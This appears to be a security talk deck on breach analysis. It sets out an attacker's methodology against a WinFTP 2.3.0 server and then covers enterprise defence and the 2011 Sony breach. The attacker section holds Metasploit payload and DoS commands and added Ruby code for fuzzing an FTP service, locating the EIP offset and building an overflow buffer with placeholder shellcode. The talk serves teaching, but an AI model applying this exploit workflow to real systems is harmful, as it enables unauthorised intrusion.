Breach Analysis - Jonathan Sinclair 1
Breach Analysis - Insights from technical breach to protective measures
By J.Sinclair
Talk Outcomes
• Demonstrate security from two perspectives
– The goal of a Blackhat
– The goal of a Whitehat
• An introduction to tooling
Perspectives
White vs. Black
Blackhat Perspective
• Motivating Factors
– Like the challenge (dedication)
– Self-promotion / Fame
– Want to improve security by showing it’s failing (grey hat; see the work by Tavis Ormandy)
– Money
• Focus
– Breaching security
• Penetration Testing
• Exploit writing
• Bug hunting
• Social Engineering
Where to start
• Follow a methodology / plan
– Intelligence Gathering: Passive/Active
– Vulnerability Analysis: Active
– Exploitation: Active
– Post Exploitation: Active
– Reporting (Bad guys don’t care about this. It leaves evidence)
Steps of an attacker (Tools of the trade)
• Intelligence Gathering: Maltego, social harvesting
• Reconnaissance:
– Zenmap/Nmap – Find a service
• Get the service listing:
– Telnet, smtp, https, printer, msrpc, irc, http-proxy, ftp
• Query the services:
– Test logins e.g. ftp, telnet, smtp
• Identify software information:
– WinFTP version 2.3.0
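As an added example (not part of the talk and not the author's code), a small Ruby parser that turns nmap's grepable output (-oG) into the open-port / service / version listing the reconnaissance steps above hunt through. The scan output embedded below is constructed to match the services the slide lists; the host addresses and banner strings (including the WinFTP 2.3.0 banner) are assumptions.

```ruby
# Added example: parse nmap grepable (-oG) output into a service listing.
# Each "Host:" line carries a tab-separated "Ports:" field whose entries are
# comma-separated and shaped port/state/proto/owner/service/rpcinfo/version/.

# Constructed sample scan (not real output); hosts and banners are assumed.
SAMPLE_GNMAP = <<~GNMAP
  # Nmap scan initiated as: nmap -sV -oG scan.gnmap 192.0.2.0/28   (constructed sample)
  Host: 192.0.2.10 ()\tStatus: Up
  Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp//WinFTP Server 2.3.0/, 22/closed/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp//Microsoft ESMTP 6.0/, 80/open/tcp//http-proxy///, 135/open/tcp//msrpc//Microsoft Windows RPC/, 443/open/tcp//https///\tIgnored State: closed (993)
  Host: 192.0.2.11 ()\tStatus: Up
  Host: 192.0.2.11 ()\tPorts: 9100/open/tcp//jetdirect///\tIgnored State: closed (999)
GNMAP

Service = Struct.new(:host, :port, :proto, :name, :version)

# Returns one Service per open port; closed/filtered ports are dropped and a
# missing version banner becomes nil.
def parse_gnmap(text)
  text.each_line.flat_map do |line|
    next [] unless line.start_with?('Host:') && line.include?("\tPorts:")
    host = line[/\AHost: (\S+)/, 1]
    ports_field = line.split("\t").find { |f| f.start_with?('Ports:') }
    ports_field.sub(/\APorts: /, '').split(', ').map do |entry|
      port, state, proto, _owner, name, _rpc, version = entry.split('/', 7)
      next nil unless state == 'open'
      version = version.to_s.chomp('/')          # trailing field terminator
      Service.new(host, port.to_i, proto, name, version.empty? ? nil : version)
    end.compact
  end
end

# Services that announced a product/version: the strings to search for in
# exploit-db, NVD or Metasploit.
def versioned(services)
  services.select(&:version)
end

# Open services that gave nmap no banner: grab it by hand (telnet/nc) and
# try logins where the protocol allows it (ftp, telnet, smtp).
def unversioned(services)
  services.reject(&:version)
end

def report(services)
  services.map do |s|
    format('%-12s %5d/%s %-12s %s', s.host, s.port, s.proto, s.name, s.version || '(no banner)')
  end
end

if __FILE__ == $PROGRAM_NAME
  puts report(parse_gnmap(SAMPLE_GNMAP))
end
```

Run against a real scan with `nmap -sV -oG scan.gnmap <targets>` and feed the file contents to `parse_gnmap`; the version strings from `versioned` are what go into the exploit search in the next step.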
Steps of an attacker
• Exploit
– Check exploit-db, NIST NVD, Metasploit, Nessus etc.
– Set up a lab environment
– Download the app you want to exploit
– Start fuzzing: feed the application malformed input to provoke a crash
Steps of an attacker
• Attach to Immunity Debugger or your favourite debugger: OllyDbg, WinDbg, IDA Pro
Steps of an attacker
• Control the crash
– Manipulate EIP via ECX and EDX
– Jump to your shellcode
• Generate via Metasploit (-b lists the bytes the target mangles, which the encoder must avoid):
– msf payload(shell_bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'
– Prep your exploit in Ruby
– Launch at the target system
• ./msfconsole
• use auxiliary/dos/windows/ftp/winftp230_remote
• exploit
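The sequence from fuzzing through buffer construction, as an added Ruby example that is not the talk's code and does not use the talk's Metasploit modules: a fuzz-string generator with a hypothetical FTP sender, the cyclic pattern and offset lookup that Metasploit's pattern_create.rb / pattern_offset.rb use to locate the EIP overwrite, a bad-character check for the byte list given to `generate -b`, and the final buffer layout. The target host and port, the EIP value "read from the debugger", the return address and the shellcode bytes are placeholders.

```ruby
require 'socket'
require 'timeout'

# Added example: offline helpers for the stack-overflow workflow the slides
# describe. Host, port, EIP value, return address and shellcode are placeholders.

# Step 1 (fuzz): growing strings to send as the argument of one FTP command.
def fuzz_strings(step: 100, max: 2000)
  (step..max).step(step).map { |n| 'A' * n }
end

# Send each fuzz string after the banner and report the first length at which
# the service stops answering. Hypothetical target; not exercised offline.
def fuzz_ftp(host, port, command: 'USER')
  fuzz_strings.each do |s|
    begin
      Timeout.timeout(5) do
        sock = TCPSocket.new(host, port)
        sock.gets                                  # 220 banner
        sock.write("#{command} #{s}\r\n")
        reply = sock.gets
        sock.close
        return s.length if reply.nil?              # connection dropped: crash candidate
      end
    rescue Timeout::Error, Errno::ECONNREFUSED, Errno::ECONNRESET
      return s.length
    end
  end
  nil
end

# Step 3 (control the crash): Metasploit-style cyclic pattern. Every 3-byte
# triple Upper+lower+digit is unique, so the 4 bytes that land in EIP map to
# exactly one offset in the buffer.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# EIP as the debugger shows it (a little-endian dword) -> offset into the pattern.
def pattern_offset(eip, length = 5000)
  pattern_create(length).index([eip].pack('V'))
end

# Step 4 (generate -b ...): bytes the target mangles must not be in the payload.
# Returns the offending byte values; empty when the payload is clean.
def bad_chars_in(payload, bad)
  payload.bytes.uniq & bad.bytes
end

# Step 5 (prep the exploit): junk up to the saved return address, the overwrite
# (address of an instruction that transfers control into the buffer, e.g. a JMP
# through a register that points at it; placeholder value here), a NOP sled,
# the payload, then padding to the length that crashed the service.
def build_buffer(offset:, ret:, payload:, total:, bad: "\x00".b)
  found = bad_chars_in(payload, bad)
  raise "payload contains bad chars: #{found.map { |b| format('\\x%02x', b) }.join}" unless found.empty?
  buf = ('A' * offset).b
  buf << [ret].pack('V')
  buf << ("\x90".b * 16)
  buf << payload.b
  raise 'buffer exceeds crash length' if buf.bytesize > total
  buf << ('C' * (total - buf.bytesize))
end

if __FILE__ == $PROGRAM_NAME
  eip = 0x64413364                      # assumed value shown by the debugger
  off = pattern_offset(eip)             # 100 for that value
  buf = build_buffer(offset: off, ret: 0xdeadbeef, payload: "\xcc".b * 8, total: 1000)
  puts "EIP offset #{off}, buffer #{buf.bytesize} bytes"
end
```

In use: send `pattern_create(crash_length)` in place of the 'A' string that crashed the service, read EIP in the debugger, and `pattern_offset` gives the junk length; the payload bytes come from Metasploit's generator with the same bad-character list, and `build_buffer` refuses a payload that still contains one of them.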
Steps of an attacker
• Got shell – Bad guy wins
– Starting interaction with 2...
– Microsoft Windows XP [Version 5.1.2600]
– (C) Copyright 1985-2001 Microsoft Corp.
– C:\Documents and Settings\victim\Desktop>
Access Granted
• Network security bypassed
• Access to a single system can lead to additional breaches
• Pivot point (post-exploitation) for future attacks identified
Game Over
Whitehat Perspective
• Motivating Factors
– Secure your enterprise
– Keep company assets and intellectual property safe
– Engineer a secure solution
– Fame (would be nice but rarely appreciated)
• Focus
– Salary
– Watching the bad guys
– Staying current while maintaining the old
Why it’s so hard to be good
• Security dilemma:
– “The intruder only needs to exploit one of the victims in order to compromise the enterprise.”
• Security mantra:
– “There is no perfect defence”
• Security solution – the 3 pillars:
– Awareness
– Process
– Tools
Security Awareness (1)
• Ensure people are educated
– Set up awareness campaigns
– Create training programmes
– Bring security thinking to the people
• Relate to cultural differences (US vs. Switzerland)
Security Awareness (2)
• Create a mind-set of critical thinking and encourage people to ask the ‘what if..’ type questions
• Security thinking has nothing to do with being a techy. (Techies nearly always forget this)
Security Process
• What is actually important to you?
– Know what you want
– Know what your risk appetite is
– Integrate security into everything you do
Tooling
• Firewalls, IPS/IDS, DLP, SIEM, antivirus etc. will only cover your last 20%
• Most incidents come from internal employees
– Symantec figures (1996 – 2002): 59%
– CERT figures (2010): 60%
– Open Security Foundation (2010): 47%
• Tools have vulnerabilities: Wireshark!
Enterprise security
• The message: “Your organisation will be breached”
• What to consider
– You need to know when this happens
– You need to know how to contain it
– You need to be able to understand what it does to your reputation
Enterprise security: Sony
• Case Study:
– Sony breach in 2011
– 25 million personal details stolen from the Sony Online Entertainment network
• Name, Address, Email, DoB, Phone numbers
• Motive:
– Unknown but potentially to sell on credit card information (the hack didn’t reveal the 3-digit security code)
Enterprise security: Sony
• Reaction by Sony
– SOE network was suspended
• SOE was then rebuilt
– Company would grant 30 days additional playing time to registered users
• Reaction by the public
– Legal action brought against Sony
– In the UK Sony was fined £250,000
Enterprise security: Sony
• Overall cost
– Profits plunged 59% or 15.5bn Yen as a combined result of the cyber breach and the Japanese tsunami
– Continued losses to the brand into 2012
• Real issues
– Personal data lost
– Credit card fraud became more prevalent
Enterprise security: Final Thoughts
• Take away message:
– The data a company may lose in a security breach may not be ‘secret’ data e.g. IP, however reputation loss will ALWAYS cost an enterprise
• Security in an enterprise is about protecting reputation!
Questions and Answers
?